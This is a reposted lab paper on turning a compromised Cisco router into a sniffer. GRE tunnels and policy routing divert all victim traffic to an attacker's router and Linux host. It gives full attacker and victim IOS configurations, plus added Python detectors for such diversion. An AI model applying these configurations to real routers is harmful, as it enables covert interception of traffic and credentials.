[Repost] Router Sniffing

  Author: William M. Hidalgo redkommie<@>gmail.com

.: Contents :.

   I. INTRODUCTION
       - Disclaimer
       - About
       - References

   II. GETTING STARTED
       - Outline
       - Equipment

   III. CONFIGURATION
       - Routers
       - Linux Workstation
       - Windows Workstation

   IV. TESTING

   V. CONCLUSION

   APPENDIX
       - Cloud Router Configuration
       - Victim Router Configuration
       - Attacker Router Configuration


.: I. INTRODUCTION :.

[-=] Disclaimer [=-]

The use of this document is for educational purposes only. Any misuse of this
document is the responsibility of the reader.

[-=] About [=-]

The purpose of this paper is to demonstrate that a compromised Cisco router can
be made to act as a network traffic sniffer by combining GRE tunnels with policy
routing. This is of course only possible if the border router, or any other
router on the path, has been fully compromised.

[-=] References [=-]

The following articles were used as reference material.

   - Things to do in Cisco Land when you are dead
    http://www.phrack.com/show.php?p=56&a=10

   - Red Team Assessment of Parliament Hill Firewall
    http://www.giac.org/practical/Joshua_Wright_GCIH.zip

   - Using a compromised Router to Capture Network Traffic
    http://www.geocities.com/david_taylor_au


.: II. GETTING STARTED :.

[-=] Outline [=-]

The goal is to create a GRE tunnel between two routers (one the attacker's and
the other the victim's), use policy routing to send traffic from the Victim
router to the Attacker router, and have the Attacker router policy-route that
traffic to a Linux host inside the attacker's network, which acts as the
sniffer. The traffic to be redirected must be matched with an access-list, and
traffic flow in and out of the victim's network must remain intact.

The reason for using GRE tunnels is to create a logical 'one hop' distance from
the Attacker router to the Victim router. Once this is done the
'set ip next-hop <ip_address>' command can be used to redirect traffic to the
Attacker router.

[-=] Equipment [=-]

The following equipment was used to perform this test:

   - Three Cisco 2600 routers
   - Two Cisco 2950 switches
   - Windows XP workstation
   - Workstation running the Auditor Security Collection CD
    (Auditor CD - http://www.remote-exploit.org)

.: III. CONFIGURATION :.

[-=] Routers [=-]

Configure all three routers with a basic configuration. Use the following
diagram as a reference when configuring and cabling <INSERT IMAGE> (note: the
Attacker router has a secondary IP address on its FastEthernet interface). For
the Cloud router use the configuration provided in the Appendix at the end of
the document.

   -= Use the network diagram as a reference throughout the document. =-

Now begins the configuration of the GRE tunnels. First we will configure the
Victim router:

  -=Victim Router=-

   Victim(config)#interface tunnel0
   Victim(config-if)#ip address 192.168.10.1 255.255.255.0
   Victim(config-if)#tunnel source Serial0/0
   Victim(config-if)#tunnel destination 199.6.6.2
   Victim(config-if)#tunnel mode gre ip
   
Now likewise on the Attacker router.

   -=Attacker Router=-

   Attacker(config)#interface tunnel0
   Attacker(config-if)#ip address 192.168.10.2 255.255.255.0
   Attacker(config-if)#tunnel source Serial0/1
   Attacker(config-if)#tunnel destination 201.100.11.1
   Attacker(config-if)#tunnel mode gre ip

Now ping the tunnel interface IP addresses to confirm connectivity. If the
pings succeed, move on to configuring policy routing. An access-list is used to
match the traffic to be sent through the tunnel; for this test I had the
access-list match all traffic. The access-list can instead be configured to
match only specific traffic, such as SNMP, telnet, or any other traffic you
desire.

   -=Victim Router=-

   Victim(config)#access-list 101 permit ip any any
   Victim(config)#route-map divert-traffic
   Victim(config-route-map)#match ip address 101
   Victim(config-route-map)#set ip next-hop 192.168.10.2
   Victim(config-route-map)#exit
   Victim(config)#interface FastEthernet0/0
   Victim(config-if)#ip policy route-map divert-traffic
   
Now the Attacker router. The first route-map sends traffic arriving from the
tunnel to the sniffer host; the second sends the traffic the sniffer forwards
back out through the tunnel to the Victim router (as in the Attacker
configuration in the Appendix, it is applied to FastEthernet0/0).

   -=Attacker Router=-
   
   Attacker(config)#access-list 101 permit ip any any
   Attacker(config)#route-map divert-to-sniffer
   Attacker(config-route-map)#match ip address 101
   Attacker(config-route-map)#set ip next-hop 192.168.3.5
   Attacker(config-route-map)#exit
   Attacker(config)#interface tunnel0
   Attacker(config-if)#ip policy route-map divert-to-sniffer
   Attacker(config-if)#exit
   Attacker(config)#route-map divert-out
   Attacker(config-route-map)#match ip address 101
   Attacker(config-route-map)#set ip next-hop 192.168.10.1
   Attacker(config-route-map)#exit
   Attacker(config)#interface FastEthernet0/0
   Attacker(config-if)#ip policy route-map divert-out

This concludes configuring the routers.
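The combination built above (a GRE tunnel interface plus a policy route-map whose next-hop lies inside that tunnel's subnet) is also the pattern a defender can look for in a router's running-config. The following script is an added example, not part of the original paper: it flags every interface whose 'ip policy route-map' diverts matched traffic into a GRE tunnel. The sample configuration is the Victim router's, trimmed to the relevant lines.

```python
import ipaddress

# Constructed sample input: the Victim router's configuration from this paper, trimmed.
VICTIM_CONFIG = """\
interface Tunnel0
 ip address 192.168.10.1 255.255.255.0
 tunnel destination 199.6.6.2
interface FastEthernet0/0
 ip address 192.168.1.1 255.255.255.0
 ip policy route-map divert-traffic
access-list 101 permit ip any any
route-map divert-traffic permit 10
 match ip address 101
 set ip next-hop 192.168.10.2
"""

def parse_blocks(config):
    """Group indented IOS lines under their unindented header line."""
    blocks, current = {}, []
    for line in config.splitlines():
        if line and not line.startswith(" "):
            current = blocks.setdefault(line.strip(), [])
        elif line.strip():
            current.append(line.strip())
    return blocks

def audit(config):
    """(interface, route-map, tunnel) for each interface policy-routing into a GRE tunnel subnet."""
    blocks = parse_blocks(config)
    tunnels, nexthops, policies = {}, {}, {}   # name -> subnet / next-hop / route-map
    for header, body in blocks.items():
        kind, name = (header.split() + [""])[:2]
        for l in body:
            w = l.split()
            if kind == "interface" and name.startswith("Tunnel") and w[:2] == ["ip", "address"]:
                tunnels[name] = ipaddress.ip_interface(f"{w[2]}/{w[3]}").network
            elif kind == "interface" and w[:3] == ["ip", "policy", "route-map"]:
                policies[name] = w[3]
            elif kind == "route-map" and w[:3] == ["set", "ip", "next-hop"]:
                nexthops[name] = ipaddress.ip_address(w[3])
    findings = []
    for iface, rm in policies.items():
        for tun, net in tunnels.items():
            if rm in nexthops and nexthops[rm] in net:
                findings.append((iface, rm, tun))
    return findings

if __name__ == "__main__":
    print(audit(VICTIM_CONFIG))   # [('FastEthernet0/0', 'divert-traffic', 'Tunnel0')]
```

A clean router that uses no tunnel interfaces returns an empty list, so the check can run over every saved configuration on a schedule.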

[-=] Linux Workstation [=-]

The Linux workstation must have two network interface cards. One interface will
accept the traffic and the other will send it back out. This must be done to
avoid creating a DoS on the victim network.

You can use any Linux distro you like, but I recommend the Auditor Security
Collection. Download the Auditor Security Collection ISO, burn it to a CD, and
boot from that CD. For more information on the Auditor CD go to
http://www.remote-exploit.org.

Configure the interfaces with the following IP and gateway addresses:

    [eth0]
    IP: 192.168.3.5
    Netmask: 255.255.255.0
    Gateway: 192.168.3.1

    [eth1]
    IP: 192.168.4.5
    Netmask: 255.255.255.0
    Gateway: 192.168.4.1
   

The incoming interface will be eth1 and the outgoing will be eth0. For the
traffic to be forwarded back out, IP forwarding must be enabled; to do this
type:

   echo 1 > /proc/sys/net/ipv4/ip_forward

Failing to do this will result in a DoS of the Victim network, because the
diverted traffic never leaves the sniffer.

[-=] Windows Workstation [=-]

Configure the workstation with the IP and gateway of:

   IP: 192.168.1.5
   Netmask: 255.255.255.0
   Gateway: 192.168.1.1


.: IV. TESTING :.

On the Linux workstation run a packet sniffing program, preferably Ethereal,
and start a packet capture. From the Windows workstation ping an interface of
the Cloud router and make sure it succeeds. Now check the Linux workstation: the
capture should show the ping request. All traffic sent out of the Victim router
will be seen.
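What the sniffer sees in that capture, and what a sensor on the WAN side of the Victim router would see, is shown by the following added example (not code from the original paper). It builds a constructed GRE-encapsulated ping as Tunnel0 would carry it, parses the outer and inner IPv4 headers, and raises an alert for GRE (IP protocol 47) sent to any peer outside a known-good set; the addresses come from the paper's diagram, the packet bytes are constructed here and checksums are left at zero.

```python
import ipaddress
import struct

def ipv4_header(src, dst, proto, payload_len):
    """Minimal 20-byte IPv4 header (constructed for this example; checksum left at 0)."""
    return struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + payload_len, 0, 0, 64, proto, 0,
                       ipaddress.IPv4Address(src).packed, ipaddress.IPv4Address(dst).packed)

def gre_encapsulate(outer_src, outer_dst, inner):
    """Wrap an IPv4 packet in GRE (IP protocol 47) as a 'tunnel mode gre ip' interface does."""
    gre = struct.pack("!HH", 0, 0x0800)  # no C/K/S flags; protocol type 0x0800 = IPv4
    return ipv4_header(outer_src, outer_dst, 47, len(gre) + len(inner)) + gre + inner

def inspect_gre(packet):
    """Outer and inner addressing of a GRE-over-IPv4 packet, or None if it is not GRE."""
    if len(packet) < 24 or packet[0] >> 4 != 4 or packet[9] != 47:
        return None
    ihl = (packet[0] & 0x0F) * 4
    if len(packet) < ihl + 4:
        return None
    flags, ptype = struct.unpack("!HH", packet[ihl:ihl + 4])
    # Optional GRE fields, 4 bytes each: checksum/reserved (C or R), key (K), sequence (S)
    opt = sum(4 for bit in (0xC000, 0x2000, 0x1000) if flags & bit)
    inner = packet[ihl + 4 + opt:]
    info = {"outer_src": str(ipaddress.IPv4Address(packet[12:16])),
            "outer_dst": str(ipaddress.IPv4Address(packet[16:20])),
            "inner_src": None, "inner_dst": None, "inner_proto": None}
    if ptype == 0x0800 and len(inner) >= 20:   # payload is IPv4: read the tunnelled addressing
        info.update(inner_src=str(ipaddress.IPv4Address(inner[12:16])),
                    inner_dst=str(ipaddress.IPv4Address(inner[16:20])),
                    inner_proto=inner[9])
    return info

def gre_alert(packet, allowed_peers=frozenset()):
    """True when the packet is GRE to a peer outside the known-good set (for the Victim: none)."""
    info = inspect_gre(packet)
    return info is not None and info["outer_dst"] not in allowed_peers

# Constructed test traffic: the Windows workstation's ping to the Cloud router, then the same
# packet as the Victim's Serial0/0 emits it after policy routing pushed it into Tunnel0.
PING = ipv4_header("192.168.1.5", "199.6.6.1", 1, 8) + struct.pack("!BBHHH", 8, 0, 0, 1, 1)
TUNNELED = gre_encapsulate("201.100.11.1", "199.6.6.2", PING)
```

A router that has no business running GRE should never emit protocol 47, so the allow-list for the Victim's WAN link is empty and the first tunnelled packet is the alert.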


.: V. CONCLUSION :.

It has been shown that a router can be turned into a network sniffer with a
few commands. SNMP community strings, passwords, etc. can then be captured and
used to escalate an intruder's attack on the network. I hope this document will
create greater awareness of the threat that exists once a router is
compromised. For information on hardening Cisco routers visit the NSA site and
download the Router Security Configuration Guide at
http://www.nsa.gov/snac/downloads_all.cfm


.: APPENDIX :.

-=Cloud Router Configuration=-

hostname Cloud

enable secret class

interface Serial0/0
ip address 201.100.11.2 255.255.255.0
clockrate 56000

interface Serial0/1
ip address 199.6.6.1 255.255.255.0

router rip
network 199.6.6.0
network 201.100.11.0

line con 0
password cisco
logging synchronous
login
line aux 0
line vty 0 4
password cisco
login


-=Victim Router Configuration=-

hostname Victim

enable secret class

interface Tunnel0
ip address 192.168.10.1 255.255.255.0
tunnel source Serial0/0
tunnel destination 199.6.6.2

interface FastEthernet0/0
ip address 192.168.1.1 255.255.255.0
ip policy route-map divert-traffic

interface Serial0/0
ip address 201.100.11.1 255.255.255.0

router rip
network 192.168.1.0
network 201.100.11.0

access-list 101 permit ip any any

route-map divert-traffic permit 10
match ip address 101
set ip next-hop 192.168.10.2

line con 0
password cisco
logging synchronous
login
line aux 0
line vty 0 4
password cisco
login


-=Attacker Router Configuration=-

hostname Attacker

enable secret class

interface Tunnel0
ip address 192.168.10.2 255.255.255.0
ip policy route-map divert-to-sniffer
tunnel source Serial0/1
tunnel destination 201.100.11.1

interface FastEthernet0/0
ip address 192.168.4.1 255.255.255.0 secondary
ip address 192.168.3.1 255.255.255.0
ip policy route-map divert-out

interface Serial0/1
ip address 199.6.6.2 255.255.255.0
clockrate 56000

router rip
network 192.168.3.0
network 199.6.6.0

line con 0
password cisco
logging synchronous
login
line aux 0
line vty 0 4
password cisco
login